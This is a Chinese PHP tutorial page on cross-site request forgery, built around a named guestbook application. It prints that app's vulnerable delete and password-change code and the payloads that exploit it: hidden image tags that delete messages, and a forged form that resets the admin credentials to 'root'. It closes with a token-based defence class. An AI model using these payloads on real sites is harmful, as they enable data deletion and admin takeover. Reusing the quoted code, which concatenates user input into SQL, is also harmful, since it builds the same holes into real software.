php漏洞之跨网站请求伪造与防止伪造方法


Posted in PHP onAugust 15, 2013

伪造跨站请求介绍
伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:

伪造链接,引诱用户点击,或是让用户在不知情的情况下访问

伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。

比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦。
如果攻击者以隐藏的方式发送给目标用户链接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0

任意删除留言
//delbook.php 此页面用于删除留言
<?php
include_once("dlyz.php");    //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //传递要删除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('删除成功!');";
echo " location='book.php';"; 
echo "</script>";
?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>网站:<a href=https://3water.com>三水点靠木</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('修改成功!');";
echo " location='pass.php';"; 
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0"> 
<input type="text" name="username" value="root">
<input type="password" name="password" value="root"> 
<input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
<textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
</form>
</body>

存为attack.html,放到自己网站上https://3water.com此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
防止伪造跨站请求
yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg。
随机串代码实现
咱们按照这个思路,山寨一个crumb的实现,代码如下:
<?php 
class Crumb { 
CONST SALT = "your-secret-salt"; 
static $ttl = 7200; 
static public function challenge($data) { 
return hash_hmac('md5', $data, self::SALT); 
} 
static public function issueCrumb($uid, $action = -1) { 
$i = ceil(time() / self::$ttl); 
return substr(self::challenge($i . $action . $uid), -12, 10); 
} 
static public function verifyCrumb($uid, $crumb, $action = -1) { 
$i = ceil(time() / self::$ttl); 
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb || 
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb) 
return true; 
return false; 
} 
}

代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间。

应用示例

构造表单

在表单中插入一个隐藏的随机串crumb

<form method="post" action="demo.php"> 
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>"> 
<input type="text" name="content"> 
<input type="submit"> 
</form>

处理表单 demo.php

对crumb进行检查

<?php 
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) { 
//按照正常流程处理表单 
} else { 
//crumb校验失败,错误提示流程 
} 
?>
PHP 相关文章推荐
用PHP来写记数器(详细介绍)
Oct 09 PHP
在字符串中把网址改成超级链接
Oct 09 PHP
全世界最小的php网页木马一枚 附PHP木马的防范方法
Oct 09 PHP
php date与gmdate的获取日期的区别
Feb 08 PHP
php数据库抽象层 PDO
May 07 PHP
解析php利用正则表达式解决采集内容排版的问题
Jun 20 PHP
PHP 利用Mail_MimeDecode类提取邮件信息示例
Jan 26 PHP
php绘制一条弧线的方法
Jan 24 PHP
微信支付扫码支付php版
Jul 22 PHP
PHP页面跳转实现延时跳转的方法
Dec 10 PHP
php mysql操作mysql_connect连接数据库实例详解
Dec 26 PHP
PHP/ThinkPHP实现批量打包下载文件的方法示例
Jul 31 PHP
PHP Global定义全局变量使用说明
Aug 15 #PHP
php生成图形验证码几种方法小结
Aug 15 #PHP
PHP中将ip地址转成十进制数的两种实用方法
Aug 15 #PHP
PHP怎么实现网站保存快捷方式方便用户随时浏览
Aug 15 #PHP
php正则取img标记中任意属性(正则替换去掉或改变图片img标记中的任意属性)
Aug 13 #PHP
php使用sql数据库 获取字段问题介绍
Aug 12 #PHP
完美解决PHP中的Cannot modify header information 问题
Aug 12 #PHP
You might like
php对gzip文件或者字符串解压实例参考
2008/07/25 PHP
PHP源码之explode使用说明
2011/08/05 PHP
PHP实现C#山寨ArrayList的方法
2015/07/16 PHP
Zend Framework教程之路由功能Zend_Controller_Router详解
2016/03/07 PHP
js 解决“options为空或不是对象”
2008/12/22 Javascript
重写document.write实现无阻塞加载js广告(补充)
2014/12/12 Javascript
学习Bootstrap组件之下拉菜单
2015/07/28 Javascript
纯js代码实现未知宽高的元素在指定元素中垂直水平居中显示
2015/09/12 Javascript
用js读写cookie的简单方法(推荐)
2016/08/08 Javascript
对javascript继承的理解
2016/10/11 Javascript
js利用appendChild对标签进行排序的实现方法
2016/10/16 Javascript
AngularJS  ng-repeat遍历输出的用法
2017/06/19 Javascript
AngularJS实现表单元素值绑定操作示例
2017/10/11 Javascript
详解vue中localStorage的使用方法
2018/11/22 Javascript
使用Vue-cli3.0创建的项目 如何发布npm包
2019/10/10 Javascript
vue vantUI实现文件(图片、文档、视频、音频)上传(多文件)
2019/10/15 Javascript
解决vue中使用less/sass及使用中遇到无效的问题
2020/10/24 Javascript
Python 随机生成中文验证码的实例代码
2013/03/20 Python
Python实现截屏的函数
2015/07/25 Python
python操作mysql数据库
2017/03/05 Python
Python基于回溯法子集树模板实现图的遍历功能示例
2017/09/05 Python
从头学Python之编写可执行的.py文件
2017/11/28 Python
Django框架会话技术实例分析【Cookie与Session】
2019/05/24 Python
python十进制转二进制的详解
2020/02/07 Python
PyCharm+PyQt5+QtDesigner配置详解
2020/08/12 Python
购买美国制造的相框和画框架:Picture Frames
2018/08/14 全球购物
北美主要的汽车零部件零售商:AutoShack.com
2019/02/23 全球购物
Magee 1866官网:Donegal粗花呢外套和大衣专家
2019/11/01 全球购物
中科软测试工程师面试题
2012/06/16 面试题
前台文员我鉴定
2014/01/12 职场文书
小学运动会入场式解说词
2014/02/18 职场文书
意向书范文
2014/03/31 职场文书
教师年度考核评语
2014/04/28 职场文书
2014年法制宣传日活动方案
2014/11/02 职场文书
党的群众路线教育实践活动心得体会(企业)
2014/11/03 职场文书
幼儿园六一儿童节开幕词
2016/03/04 职场文书